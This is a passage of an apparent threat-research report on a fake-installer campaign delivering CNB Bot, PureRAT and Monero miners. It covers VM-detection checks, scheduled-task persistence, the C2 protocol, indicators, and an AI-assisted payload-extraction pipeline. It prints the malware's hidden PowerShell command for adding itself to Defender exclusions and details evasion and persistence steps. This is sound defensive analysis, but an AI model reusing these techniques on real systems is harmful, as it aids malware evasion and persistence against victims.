<td align="left"><code>https://tommysbakescodes[.]ws/CNB/gate.php</code></td>
</tr>
<tr>
<td align="left">C2 URL fallback #2</td>
<td align="left"><code>https://tommysbakescodes[.]cv/CNB/gate.php</code></td>
</tr>
<tr>
<td align="left">Auth Token</td>
<td align="left"><code>0326GJSECMHSHOEYHQMKDZ</code></td>
</tr>
<tr>
<td align="left">Comms AES Key (input)</td>
<td align="left"><code>AnCnDai@4zDsxP!a3E</code></td>
</tr>
<tr>
<td align="left">Scheduled Task</td>
<td align="left"><code>HostDataProcess</code></td>
</tr>
<tr>
<td align="left">Install Dir</td>
<td align="left"><code>%APPDATA%\HostData\</code></td>
</tr>
<tr>
<td align="left">Marker File</td>
<td align="left"><code>%APPDATA%\HostData\install.dat</code></td>
</tr>
<tr>
<td align="left">Executable</td>
<td align="left"><code>sysdata.exe</code></td>
</tr>
<tr>
<td align="left">Group / Campaign</td>
<td align="left"><code>03_26</code></td>
</tr>
<tr>
<td align="left">Bot Version</td>
<td align="left"><code>1.1.6.</code></td>
</tr>
</tbody>
</table>
<h3>Execution Flow</h3>
<p>At startup, CNB Bot uses five different methods to check for VM detection:</p>
<table>
<thead>
<tr>
<th align="left">Check</th>
<th align="left">Technique</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">WMI ComputerSystem</td>
<td align="left">Manufacturer/Model: &quot;vmware&quot;, &quot;virtualbox&quot;, &quot;vbox&quot;, &quot;qemu&quot;, &quot;xen&quot;, &quot;parallels&quot;, &quot;innotek&quot;, &quot;microsoft corporation&quot; (manufacturer) + &quot;virtual machine&quot; (model)</td>
</tr>
<tr>
<td align="left">WMI BIOS</td>
<td align="left">Version/Serial: &quot;vmware&quot;, &quot;virtualbox&quot;, &quot;vbox&quot;, &quot;qemu&quot;, &quot;bochs&quot;, &quot;seabios&quot;</td>
</tr>
<tr>
<td align="left">Process list</td>
<td align="left">&quot;vmtoolsd&quot;, &quot;vmwaretray&quot;, &quot;vmwareuser&quot;, &quot;vboxservice&quot;, &quot;vboxtray&quot;, &quot;xenservice&quot;</td>
</tr>
<tr>
<td align="left">Registry</td>
<td align="left">VMware Tools / VirtualBox Guest Additions keys: &quot;SOFTWARE\VMware, Inc.\VMware Tools&quot;, &quot;SOFTWARE\Oracle\VirtualBox Guest Additions&quot;, &quot;SYSTEM\CurrentControlSet\Services\VBoxGuest&quot;, &quot;SYSTEM\CurrentControlSet\Services\VBoxSF&quot;</td>
</tr>
<tr>
<td align="left">MAC Address</td>
<td align="left">&quot;00:0C:29&quot;, &quot;00:50:56&quot;, &quot;00:05:69&quot;, &quot;08:00:27&quot;, &quot;0A:00:27&quot;, &quot;00:16:3E&quot;, &quot;00:1C:14&quot;</td>
</tr>
</tbody>
</table>
<p>Each check returns zero or one and is summed against a threshold. When the detection threshold is reached, the first process instance acquires a named mutex and enters an infinite sleep <code>(Thread.Sleep(int.MaxValue))</code>, appearing hung rather than terminating cleanly. Any subsequent instance finding the mutex already held exits immediately.</p>
<p>Otherwise, on first execution, the implant checks for <code>%APPDATA%\HostData\install.dat</code>. If absent, it performs the initial installation:</p>
<ul>
<li>Generates a random 5-character alphabetic subdirectory name under <code>%APPDATA%\HostData\</code></li>
<li>Copies itself to <code>%APPDATA%\HostData\&lt;random&gt;\sysdata.exe</code></li>
<li>Writes the installed path to <code>install.dat</code></li>
<li>Extracts benign dependencies <code>DiagSvc.dll</code> and <code>sdrsvc.dll</code> into the same directory</li>
<li>Writes a VBScript wrapper <code>sysdata.vbs</code> alongside the binary: <code>CreateObject(&quot;WScript.Shell&quot;).Run &quot;&quot;&quot;&lt;installed_path&gt;&quot;&quot;&quot;, 0, False</code></li>
<li>Creates a scheduled task named <code>HostDataProcess</code> via schtasks.exe, configured to run <code>wscript.exe //nologo sysdata.vbs</code> every 10 minutes at <code>HIGHEST</code> privilege</li>
<li>Launches the installed copy as a hidden process with <code>%TEMP%</code> as the working directory</li>
<li>Self-deletes the original copy via a self-deleting BAT script (<code>timeout /t 3</code>, <code>loop-del</code>)</li>
</ul>
<p>On subsequent runs, when <code>install.dat</code> exists, and the running path matches its contents, the implant proceeds to active operation:</p>
<ul>
<li>Sets the current working directory to <code>%TEMP%</code></li>
<li>Repairs persistence: checks if <code>sysdata.vbs</code> exists (recreates if absent) and verifies the scheduled task is configured with <code>wscript.exe</code>, re-registering it if necessary</li>
<li>Acquires a named mutex (<code>MTXCNBV11000ERCXSWOLZNBVRGH</code>) - exits if already running</li>
<li>Instantiates the victim profiler, C2 comms, and command dispatcher</li>
<li>Issues a single POST to the C2 with <code>payload: &quot;fetch&quot;</code>, handles any returned task</li>
<li>Exits - next execution is driven entirely by the 10-minute scheduled task trigger</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image7.png" alt="CNB Bot main code logic" title="CNB Bot main code logic" /></p>
<h3>C2 Communication</h3>
<p>The malware communicates with its C2 by issuing HTTP POST requests with the Content-Type set to <code>application/x-www-form-urlencoded</code>. Each field value is independently AES-256-CBC encrypted with a random IV. The AES key is derived as the SHA-256 hash of the hardcoded communications passphrase (<code>AnCnDai@4zDsxP!a3E</code>). The IV is prepended to the ciphertext, and the entire blob is base64-encoded; C2 responses follow the same format.</p>
<pre><code>encrypted_field_value = base64_encode(random_iv + AES-256-CBC_encrypt\
 (key: SHA-256('AnCnDai@4zDsxP!a3E'), iv: random_iv, data: plaintext_field_value))
</code></pre>
<p>Fields sent on every request:</p>
<table>
<thead>
<tr>
<th align="left">Field</th>
<th align="left">Value</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>desktop</code></td>
<td align="left">machine name</td>
</tr>
<tr>
<td align="left"><code>username</code></td>
<td align="left">username</td>
</tr>
<tr>
<td align="left"><code>os</code></td>
<td align="left">Windows version</td>
</tr>
<tr>
<td align="left"><code>version</code></td>
<td align="left">bot version (<code>1.1.6.</code>)</td>
</tr>
<tr>
<td align="left"><code>privileges</code></td>
<td align="left">user OR admin</td>
</tr>
<tr>
<td align="left"><code>cpu</code></td>
<td align="left">processor name from the registry</td>
</tr>
<tr>
<td align="left"><code>gpu</code></td>
<td align="left">GPU name(s) from registry</td>
</tr>
<tr>
<td align="left"><code>gpu_type</code></td>
<td align="left">yes (discrete) / no (integrated)</td>
</tr>
<tr>
<td align="left"><code>group</code></td>
<td align="left">group / campaign ID (<code>03_26</code>)</td>
</tr>
<tr>
<td align="left"><code>client_path</code></td>
<td align="left">full path of running executable</td>
</tr>
<tr>
<td align="left"><code>local_ipv4</code></td>
<td align="left">external IP via <code>ipify[.]org</code> / <code>icanhazip[.]com</code> / <code>ident[.]me</code></td>
</tr>
<tr>
<td align="left"><code>auth_token</code></td>
<td align="left">authentication token (<code>0326GJSECMHSHOEYHQMKDZ</code>)</td>
</tr>
<tr>
<td align="left"><code>timestamp</code></td>
<td align="left">Unix epoch (UTC)</td>
</tr>
<tr>
<td align="left"><code>payload</code></td>
<td align="left">Command string (“fetch”, “completed”)</td>
</tr>
</tbody>
</table>
<p>A server response decrypts to either a task string, <code>“NO TASKS”</code>, or <code>“REGISTERED/UPDATED”</code>. When the client requests a task through <code>payload: “fetch”</code>, if a task exists for the client, the C2 response decrypts to a <code>&lt;sep&gt;</code>-delimited task string: <code>task_id&lt;sep&gt;command&lt;sep&gt;argument&lt;sep&gt;RSA_sig</code>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image32.png" alt="CNB Bot dispatcher function" title="CNB Bot dispatcher function" /></p>
<p>Prior to dispatch, each task undergoes RSA-SHA256 signature verification. The signed message is the concatenated string <code>task_id&lt;sep&gt;command&lt;sep&gt;argument</code>, and the signature is the base64-decoded <code>RSA_sig</code> field. A hardcoded RSA-2048 public key is used for verification.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image20.png" alt="RSA-SHA256 task verification" title="RSA-SHA256 task verification" /></p>
<p>Tasks failing verification are silently dropped. Without the operator's RSA private key, third parties cannot issue commands to infected hosts even with full C2 access.</p>
<h3>Supported Commands</h3>
<p>3 commands are supported, described in the table below:</p>
<table>
<thead>
<tr>
<th align="left">Command</th>
<th align="left">Behavior</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>download_execute</code></td>
<td align="left">Downloads URL argument to <code>%TEMP%\&lt;random&gt;.&lt;ext&gt;</code>. Execute: .exe (hidden), .bat/.cmd (cmd /c), .vbs (wscript.exe), other (ShellExecute).</td>
</tr>
<tr>
<td align="left"><code>update</code></td>
<td align="left">Downloads URL argument to staging location <code>%TEMP%\tmp_updt236974520367.exe</code>. Runs BAT to: kill current PID, overwrite installed binary with staged download, delete staging file, and self-delete BAT.</td>
</tr>
<tr>
<td align="left"><code>uninstall</code></td>
<td align="left">Deletes scheduled task, removes <code>install.dat</code>, self-deletes via BAT, rmdir install dir, and <code>%APPDATA%\HostData\</code>.</td>
</tr>
</tbody>
</table>
<h2>Earlier Campaigns</h2>
<p>Pivoting on the PureRAT mutex <code>Aesthetics135</code>, we discovered an earlier wave of the operation that presented a different fake installer UI.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image25.png" alt="Fake installer interface from early 2025" title="Fake installer interface from early 2025" /></p>
<h3>Early 2025 Build</h3>
<p>The sample <code>bb48a52bae2ee8b98ee1888b3e7d05539c85b24548dd4c6acc08fbe5f0d7631a</code> (first seen 2025-01-30) is a Themida and .NET Reactor-protected Windows Forms application that drops PureRAT v0.3.9.</p>
<p>It consists of 3 classes: <code>Fooo1rm</code> (the ApplicationContext entry point), <code>Form2</code> (the installer UI and the PureRAT dropper), and <code>Form3</code> (a fake registration lure). The code structure closely resembles the more recent campaigns.</p>
<p>On initialization, it immediately invokes a hidden PowerShell one-liner to add itself to Microsoft Defender exclusions before any UI appears: <code>powershell.exe -WindowStyle Hidden Add-MpPreference -ExclusionPath '&lt;self_path&gt;'; Add-MpPreference -ExclusionProcess '&lt;self_path&gt;'</code>. A timer with a 2,846 ms interval fires, instantiating and showing Form2.</p>
<p><code>Form2</code> presents a progress bar dialog titled “Getting things ready” with a 12-step timer ticking every 1,000 ms, simulating a legitimate installation.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image18.png" alt="Fake loading bar" title="Fake loading bar" /></p>
<p>A second PowerShell exclusion command covers <code>%LocalAppData%</code>, <code>%AppData%</code>, the drop directory <code>%LocalAppData%\winbuf</code>, and process names including <code>winbuf.exe</code>, <code>wintrs.exe</code>, and <code>AddlnProcess.exe</code>. The PureRAT v0.3.9 payload is extracted from the assembly manifest resource and written to <code>%LocalAppData%\winbuf\winbuf.exe</code>. Persistence is established via <code>schtasks.exe</code>.</p>
<p>Extracted PureRAT config:</p>
<ul>
<li><code>wndlogon.hopto.org</code> (C2 #1)</li>
<li><code>wndlogon.itemdb.com</code> (C2 #2)</li>
<li><code>wndlogon.kozow.com</code> (C2 #3)</li>
<li><code>wndlogon.ydns.eu</code> (C2 #4)</li>
<li><code>Aesthetics135</code> (mutex and C2 comms key)</li>
<li><code>29-01-25</code> (build / campaign date)</li>
</ul>
<p><code>Form3</code> serves purely as a social engineering mechanism to drive <a href="https://en.wikipedia.org/wiki/Cost_per_action">Cost Per Action</a> (CPA) offer completions through a content locker.</p>
<blockquote>
<p>Content lockers are a monetization technique in which access to a resource is gated behind completing CPA (Cost Per Action) offers, such as filling out a survey or signing up for a service. The malware operator earns a commission each time a victim completes one of these offers.</p>
</blockquote>
<p>It presents a fake “Registration Required” dialog with a key entry field, a “Validate” button, and a hyperlink labeled “here” that opens <code>https://tinyurl[.]com/cmvt944y</code>. Key validation is entirely fake. Regardless of input, the handler introduces a hardcoded 2-second delay, then always returns “Invalid key. Please try again.”</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image2.png" alt="Fake registration key input invalidation" title="Fake registration key input invalidation" /></p>
<p>The TinyURL shortlink <code>tinyurl[.]com/cmvt944y</code> redirects to the lure page at <code>rapidfilesdatabaze[.]top/files/z872d515ea17b4e6c3abca9752c706242/</code>.</p>
<p>The page used to host a minimal HTML document titled &quot;Registration Key is Ready&quot;, designed to trick the victim into interacting with the CPA content locker. It presents a download icon and a fake file link labeled <code>Registration_Key.txt</code>, alongside a unique campaign tracking ID (<code>z872d515ea17b4e6c3abca9752c706242</code>) displayed in the page body.</p>
<p>The content locker JavaScript (<code>3193171.js</code>) is loaded from <code>d3nxbjuv18k2dn.cloudfront[.]net</code>, and clicking the <code>Registration_Key.txt</code> link triggers the offer wall under the pretext of unlocking a license key.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image31.png" alt="Content at rapidfilesdatabaze[.]top/files/z872d515ea17b4e6c3abca9752c706242/" title="Content at rapidfilesdatabaze[.]top/files/z872d515ea17b4e6c3abca9752c706242/" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image23.png" alt="CPA content locker JS (3193171.js)" title="CPA content locker JS (3193171.js)" /></p>
<h3>Late 2023 Build</h3>
<p>An older sample - <code>6a01cc61f367d3bae34439f94ff3599fcccb66d05a8e000760626abb9886beac</code> (first seen 2023-11-09) presented a similar fake installer UI. This represents the earliest activity we attributed to this threat actor based on shared infrastructure and tooling.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image29.png" alt="Fake installer interface from late 2023" title="Fake installer interface from late 2023" /></p>
<p>This campaign build dropped PureRAT v0.3.8B, in which the in-memory PE loader component used a SmartAssembly-protected PureCrypter.</p>
<p>Extracted PureRAT config:</p>
<ul>
<li><code>wndlogon.hopto.org</code> (C2 #1)</li>
<li><code>wndlogon.itemdb.com</code> (C2 #2)</li>
<li><code>wndlogon.kozow.com</code> (C2 #3)</li>
<li><code>wndlogon.ydns.eu</code> (C2 #4)</li>
<li><code>Aesthetics135</code> (mutex and C2 comms key)</li>
<li><code>09.11.23</code> (build / campaign date)</li>
</ul>
<p>On the installation window, the “go here” hyperlink opens a short link <code>https://t[.]ly/MQXPm</code> that redirects to the lure page <code>https://softwaredlfast[.]top/files/n71fGbs2b7XceW3op71aQsrx41Rkeydl/</code>, which presents 2 outgoing fake download links:</p>
<ul>
<li><code>https://rapidfilesbaze[.]top/z78fGbs2b7XceWop21aQsrx41Rkeydsktp/</code></li>
<li><code>https://rapidfilesbaze[.]top/z78fGbs2b7XceWop21aQsrx41Rkeymbl/</code></li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image27.png" alt="Content at https://softwaredlfast[.]top/files/n71fGbs2b7XceW3op71aQsrx41Rkeydl/" title="Content at https://softwaredlfast[.]top/files/n71fGbs2b7XceW3op71aQsrx41Rkeydl/" /></p>
<p>Both links were offline at the time of analysis. However, historical data indicates that <code>rapidfilesbaze[.]top</code> has been used consistently for CPA-style offer lures.</p>
<p>A <a href="http://URLScan.io">URLScan.io</a> archived response for a related path (<code>rapidfilesbaze[.]top/h74fGbs2b7XceWop71aQsrx41-Registration-Key-Mobile/</code>) confirms the site's use as a lure landing page.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image12.png" alt="Content at rapidfilesbaze[.]top/h74fGbs2b7XceWop71aQsrx41-Registration-Key-Mobile/" title="Content at rapidfilesbaze[.]top/h74fGbs2b7XceWop71aQsrx41-Registration-Key-Mobile/" /></p>
<p>The downstream unlocker site at <code>https://unlockcontent[.]net/cl/i/me9mn2</code> remains active as of this writing.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image37.png" alt="Content at https://unlockcontent[.]net/cl/i/me9mn2" title="Content at https://unlockcontent[.]net/cl/i/me9mn2" /></p>
<h2>GitHub Profiles</h2>
<p>Beyond the C2 infrastructure, the threat actor abuses GitHub as a payload delivery CDN, hosting staged binaries across two identified accounts. This technique shifts the download-and-execute step away from operator-controlled infrastructure to a trusted platform, reducing detection friction. Both profiles were confirmed through decrypting C2 task traffic captured by VirusTotal sandboxes, which issued download-and-execute tasks pointing directly to raw GitHub content URLs. The operator routinely deletes individual binaries and entire repositories; the files documented below were captured via VirusTotal submissions or direct retrieval from GitHub prior to deletion.</p>
<p>The first profile, <code>https://github[.]com/lebnabar198</code>, surfaced during analysis of Campaign 2. After decrypting the C2 traffic from the <code>windirautoupdates[.]top</code> server, we observed the PureRAT implant being instructed to fetch a payload from this account, specifically the custom XMRig loader <code>MnrsInstllr_240126.exe</code>. This establishes a direct operational link between the PureRAT C2 and this GitHub profile.</p>
<p>The second profile, <code>https://github[.]com/ugurlutaha6116</code>, was identified by decrypting traffic from a PureRAT loader (SHA-256: <code>e1e87d11079d33ec1a1c25629cbb747e56fe17071bde5fd8c982461b5baa80a4</code>), which used the same PBKDF2 key derivation structure with the comms key <code>Aesthetics152</code>. The decrypted task pointed to the hosted payload <code>PM3107.exe</code>.</p>
<p>The hosted files map to the following payloads:</p>
<table>
<thead>
<tr>
<th align="left">Filename</th>
<th align="left">Associated payload</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>CNB-v112-zUpdt-inPmnr.exe</code></td>
<td align="left">CNB Bot</td>
</tr>
<tr>
<td align="left"><code>MyXMRmnr_Instllr_0302.exe</code></td>
<td align="left">Custom XMRig loader</td>
</tr>
<tr>
<td align="left"><code>MnrsInstllr_240126.exe</code>, <code>MnrsInstllr_030126.exe</code></td>
<td align="left">Custom XMRig loader</td>
</tr>
<tr>
<td align="left"><code>PM2311.exe, PM1109.exe</code>, …</td>
<td align="left">PureMiner</td>
</tr>
<tr>
<td align="left"><code>Pmnr_1303_wALL.exe</code>, <code>Pmnr_Instllr_1303.exe</code>, …</td>
<td align="left">PureMiner</td>
</tr>
<tr>
<td align="left"><code>A_Instllr_250525.exe</code></td>
<td align="left">AsyncRAT</td>
</tr>
<tr>
<td align="left"><code>U_n_P_Installer_220725.exe</code>, <code>U_n_P_Installer_110725.exe</code>, …</td>
<td align="left">Loader for SilentCryptoMiner &amp; PureMiner</td>
</tr>
<tr>
<td align="left"><code>umnr_120525.exe</code>, <code>Umnr_1403_frPmnr.exe</code>, …</td>
<td align="left">SilentCryptoMiner</td>
</tr>
<tr>
<td align="left"><code>plsr_instllr_1804.exe</code></td>
<td align="left">Pulsar RAT</td>
</tr>
</tbody>
</table>
<h2>Monero Wallet Analysis</h2>
<p>During our analysis of the cryptominer payloads, we successfully extracted four active Monero (XMR) wallet addresses from the malware's configuration. Because the threat actor is routing their compromised hosts through public mining pools, we can query the pool's public dashboards using these wallet addresses. It provides information about the operational scale and profitability of the campaigns.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image30.png" alt="Tracking mining activity through a public dashboard" title="Tracking mining activity through a public dashboard" /></p>
<p>Based on the telemetry available at the time of writing, here is the current status of the attacker's mining operations:</p>
<ul>
<li><strong>Wallet 1:</strong> <code>87NnUp8GKVBZ8pFV75Gas4A5nMMH7gEeo8AXBhm9Q6vS5oQ6SzCYf1bJr7Lib35VN2UX271PAXeqRFDmjo5SXm3zFDfDSWD</code>
<ul>
<li><strong>Active Workers:</strong> 7</li>
<li><strong>Estimated Hashrate Return:</strong> ~0.0172 XMR / day</li>
<li><strong>Total Paid Out:</strong> 2.2 XMR</li>
</ul>
</li>
<li><strong>Wallet 2:</strong> <code>89FYoLrfXwEDAVAsVYbhAfg3mATUtBzNAK2LG8wwDKfNTRhmNRTBn1VbwpFxEpJ8h5fQa2A4CS1tpRv7amUdJ3ZbUoVu6T1</code>
<ul>
<li><strong>Active Workers:</strong> 3</li>
<li><strong>Estimated Hashrate Return:</strong> ~0.02 XMR / day</li>
<li><strong>Total Paid Out:</strong> 4.23 XMR</li>
</ul>
</li>
<li><strong>Wallet 3:</strong> <code>89WoZKYoHhcNEFRV8jjB6nDqzjiBtQqyp4agGfyHwED1XyVAoknfVsvY1CwEHG6nwZFJGFTF5XbqC4tAQbnoFFCX8UQof3G</code>
<ul>
<li><strong>Active Workers:</strong> 2</li>
<li><strong>Estimated Hashrate Return:</strong> ~0.0057 XMR / day</li>
<li><strong>Total Paid Out:</strong> 11.69 XMR</li>
</ul>
</li>
<li><strong>Wallet 4:</strong><br />
<code>83Q1PKZ5yXsP8SCqjV3aV7B3UoBB3skPp49G1VnnGtv5Y5EUbFQTXvzR9cZshBYBBfd8Dm1snkkud431pdzEZ2uJTad1CiC</code>
<ul>
<li><strong>Active Workers:</strong> 2</li>
<li><strong>Estimated Hashrate Return:</strong> ~0.0036 XMR / day</li>
<li><strong>Total Paid Out:</strong> 9.76 XMR</li>
</ul>
</li>
</ul>
<p>With a combined total of over 27.88 XMR (~ USD$ 9392) already successfully paid out to the attacker, it proves that low-and-slow cryptojacking operations can yield consistent financial returns over time.</p>
<h2>Agentic Payload and Configuration Extraction Pipeline</h2>
<p>In this research, we examined several hundred infection chains across the campaigns we described. For each chain, we have samples, mainly .NET, which are either loaders or final payloads layered with .NET Reactor obfuscation and often Themida packing.</p>
<p>The large number of these chains makes manual configuration and unpacking time-consuming and difficult to scale across all the chains we discovered. This is why, as part of this research, we used the Claude Opus 4.5 model to quickly vibecode a payload and configuration extraction pipeline. In this section, we provide details on the choices we made and the results we obtained with this method.</p>
<h4>Triage</h4>
<p>To optimize processing time, this phase focuses on extensively exploring infection chains using VirusTotal. We begin by obtaining a list of hashes from VirusTotal based on a specific pivot. For instance, using the README.txt content as a pivot to identify other ISOs.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image39.png" alt="VirusTotal ISO pivot" title="VirusTotal ISO pivot" /></p>
<p>Claude is instructed to use a Python script to perform a recursive download. This process involves gathering information about embedded binaries and dropped files associated with each file hash. Claude then uses its “intelligence” to identify the most subsequent link in the chain and continues its investigation until it reaches what it considers the final binary in that chain. After exploring all chains, Claude analyzes the patterns and creates chain types to group them. Finally, the results are compiled into a CSV file for subsequent analysis.</p>
<p>The data we obtained includes the starting hash from VirusTotal and the final hash, representing the last file Claude successfully tracked. This demonstrates that, with the right guidance, Claude can effectively track entire chains using only information from VirusTotal.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image6.png" alt="Triaged data" title="Triaged data" /></p>
<h4>Download and Extraction</h4>
<p>Once the triage file was created, we downloaded the intermediate payloads and instructed Claude to start the automatic payload/configuration extraction process. To do this, we installed an OpenSSH server on a Windows virtual machine, then created a Claude skill containing instructions to connect to this machine and use the installed tools to perform the reverse engineering and extraction workflow.</p>
<p>The workflow is simple: Claude connects to the machine, uploads the sample, detects whether it is obfuscated or packed with Detect It Easy, and applies the appropriate deobfuscation tool until the sample is no longer obfuscated (Unlicense, .NET Reactor Slayer). It then runs the developed extraction scripts to identify what the sample is and determine the next step: either continue extraction with the child payload if the parent is a loader, or store the configuration information for the final report.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image19.png" alt="Payload/Configuration extraction Claude skill" title="Payload/Configuration extraction Claude skill" /></p>
<p>If all the extraction scripts fail, Claude must enter Research Mode. This mode is the most enjoyable part of the skill because it gives Claude a workflow to either automatically develop a new extraction script or identify why the existing script doesn't work with the variant. Claude’s Research Mode consists of using the <a href="https://github.com/dnSpyEx">dnSpyEx</a> tool installed on the machine to compile the sample's C# code, perform a complete code analysis, identify how to extract the payload or configuration, then develop a script with this knowledge to work directly with the raw binaries to be more efficient and finally store the knowledge for the next time it has to work on the same malware family.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image28.png" alt="Research mode instruction" title="Research mode instruction" /></p>
<h4>Results</h4>
<p>Using the Claude Opus 4.5 model, the results were really good. Not only did Claude succeed in handling the obfuscation layers, but it also completely researched and developed, on its own, the methods and scripts (based on the CIL of .NET binaries) to extract the final payloads and their configurations without having encountered them before.</p>
<p>It also demonstrated robust failure handling without requiring additional instruction. For example, when it encountered samples that could not be fully deobfuscated due to issues with Reactor Slayer, which made static extraction too difficult, it stopped processing, documented the problem, and proceeded to the next sample.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/fake-installers-to-monero/image9.png" alt="Claude entering Research Mode on extraction failure" title="Claude entering Research Mode on extraction failure" /></p>
<p>Of course, it is not without drawbacks:</p>
<ul>
<li>Once its context started to fill up too much, it often diverged onto useless paths and required either micro-management or a reset, hence the usefulness of having a skill with reusable instructions and a knowledge base on the work already done.</li>
<li>It takes a long time, every action requires it to “think”, however, it’s automatic and it's definitely time recovered you can use to do something else.</li>
<li>Its token consumption is particularly greedy, especially once you figure out it’s doing a lot of inefficient things.</li>
</ul>
<h2>Observations</h2>
<p>The following tables consolidate malware configurations extracted across the builds we investigated, and are not exhaustive:</p>
<p><strong>CNB Bot</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>1.1.1.</code>, <code>1.1.2.</code>, <code>1.1.3.</code>, <code>1.1.5.</code>, <code>1.1.6.</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s:</td>
<td align="left"><code>tabbysbakescodes[.]ws/CNB/gate.php</code>&lt;br /&gt;<code>tommysbakescodes[.]ws/CNB/gate.php</code>&lt;br /&gt;<code>tommysbakescodes[.]cv/CNB/gate.php</code>&lt;br /&gt;<code>win64autoupdates[.]top/CNB/gate.php</code>&lt;br /&gt;<code>autoupdatewinsystem[.]top/CNB/gate.php</code></td>
</tr>
<tr>
<td align="left">Campaign/Build ID</td>
<td align="left"><code>03_26</code>, <code>25_02_26</code>, <code>15_02_26</code>, <code>1502_26</code>, <code>0502_26</code>, <code>01-26</code>, <code>frPmnr_0126</code></td>
</tr>
<tr>
<td align="left">Auth tokens</td>
<td align="left"><code>0326GJSECMHSHOEYHQMKDZ</code> <code>020226SNDLPXSHTCSURVQ</code> <code>0226frBLKWNYHD0FS1YWE</code> <code>0126HRAOLQEFNGGRCXMITREQC</code></td>
</tr>
<tr>
<td align="left">Mutex</td>
<td align="left"><code>MTXCNBV11000ERCXSWOLZNBVRGH</code></td>
</tr>
</tbody>
</table>
<p><strong>PureRAT</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>0.3.8B</code>. <code>0.3.9</code>, <code>0.4.1</code>, <code>3.0.1</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s</td>
<td align="left"><code>windirautoupdates[.]top</code>&lt;br /&gt;<code>winautordr.hopto[.]org</code>&lt;br /&gt;<code>winautordr.itemdb[.]com</code>&lt;br /&gt;<code>winautordr.ydns[.]eu</code>&lt;br /&gt;<code>winautordr.kozow[.]com</code>&lt;br /&gt;<code>wndlogon.hopto[.]org</code>&lt;br /&gt;<code>wndlogon.itemdb[.]com</code>&lt;br /&gt;<code>wndlogon.kozow[.]com</code>&lt;br /&gt;<code>wndlogon.ydns[.]eu</code></td>
</tr>
<tr>
<td align="left">Campaign/Build IDs</td>
<td align="left"><code>23-01-26</code>, <code>14-01-26</code>, <code>03-01-26</code>, <code>24-12-25</code>, <code>25-11-25</code>, <code>08-11-25</code>, <code>29-01-25</code>, <code>09.11.23</code></td>
</tr>
<tr>
<td align="left">Mutex / C2 Comms key</td>
<td align="left"><code>Aesthetics135</code></td>
</tr>
</tbody>
</table>
<p><strong>PureMiner</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>7.0.6</code>, <code>7.0.7</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s</td>
<td align="left"><code>wndlogon.hopto[.]org</code>&lt;br /&gt;<code>wndlogon.itemdb[.]com</code>&lt;br /&gt;<code>wndlogon.ydns[.]eu</code>&lt;br /&gt;<code>wndlogon.kozow[.]com</code></td>
</tr>
<tr>
<td align="left">Campaign/Build IDs</td>
<td align="left"><code>24-10-25</code>, <code>23-11-25</code>, <code>15-09-25-MassUpdt</code>, <code>11-09-25</code>, <code>08-08-RAM</code>, <code>06-08-RAM</code>, <code>04-08-RAM</code>, <code>31-07-RAM</code>, <code>03-08-RAM</code>, <code>13-03-25</code>, <code>25-07-RAMwALL</code>, <code>25-11-25</code></td>
</tr>
<tr>
<td align="left">Wallet Address</td>
<td align="left"><code>89WoZKYoHhcNEFRV8jjB6nDqzjiBtQqyp4agGfyHwED1XyVAoknfVsvY1CwEHG6nwZFJGFTF5XbqC4tAQbnoFFCX8UQof3G</code></td>
</tr>
<tr>
<td align="left">Mutex / C2 Comms key</td>
<td align="left"><code>4c271ad41ea2f6a44ce8d0</code></td>
</tr>
</tbody>
</table>
<p><strong>Custom XMRig Loader</strong></p>
<table>
<thead>
<tr>
<th align="left">Wallet Addresses</th>
<th align="left"><code>87NnUp8GKVBZ8pFV75Gas4A5nMMH7gEeo8AXBhm9Q6vS5oQ6SzCYf1bJr7Lib35VN2UX271PAXeqRFDmjo5SXm3zFDfDSWD</code>, <code>83sDbPzoghAX45hA2Y26xvaDsKv8TLymAGKKyZwrCKB3T9kuuYBDzb64vfy9XQyrpUFQ4r8u3V2T1EzqE6CR27XmMCCwGu1</code></th>
</tr>
</thead>
</table>
<p><strong>AsyncRAT</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>0.5.8</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s</td>
<td align="left"><code>wndlogon.hopto[.]org</code>&lt;br /&gt;<code>wndlogon.itemdb[.]com</code>&lt;br /&gt;<code>wndlogon.ydns[.]eu</code>&lt;br /&gt;<code>wndlogon.kozow[.]com</code></td>
</tr>
<tr>
<td align="left">Campaign/Build IDs</td>
<td align="left"><code>BL_Bckp_250525</code></td>
</tr>
</tbody>
</table>
<p><strong>PulsarRAT</strong></p>
<table>
<thead>
